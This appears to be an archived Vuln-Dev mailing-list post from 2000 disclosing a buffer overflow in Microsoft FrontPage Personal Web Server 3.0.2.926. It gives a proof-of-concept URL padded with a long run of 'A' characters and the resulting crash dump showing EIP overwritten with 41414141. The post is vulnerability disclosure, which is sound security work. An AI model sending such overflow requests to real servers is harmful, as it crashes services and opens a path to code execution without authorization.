NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Vuln-Dev> 2000-q2

Subject: Re: More vulnerabilities in FP
From: Roman (webmadMAIL.RU)
Date: Mon Apr 24 2000 - 06:41:38 CDT

Next message: James Grinter: "Re: network appliance..."
Previous message: Securax: "Securax Extension overflow update."
Next in thread: Alfred Huger: "Re: More vulnerabilities in FP"
Reply: Alfred Huger: "Re: More vulnerabilities in FP"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I don't know maybe this is already known.
Microsoft FrontPage-PWS 3.0.2.926 contain buffer
overflow that allows to execute arbitrary code.

http://server/AAAAAAAAAAAAA lots of A>AAA

On remote side someone will see:

VHTTPD32 caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212
EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141
ECX=00fe52c4 DS=016f ESI=00fe7744 FS=404f
EDX=bffc9490 ES=016f EDI=bff94645 GS=0000
Bytes at CS:EIP:

Stack dump:
41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141

Maybe others versions of FP is vulnerable?

Next message: James Grinter: "Re: network appliance..."
Previous message: Securax: "Securax Extension overflow update."
Next in thread: Alfred Huger: "Re: More vulnerabilities in FP"
Reply: Alfred Huger: "Re: More vulnerabilities in FP"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]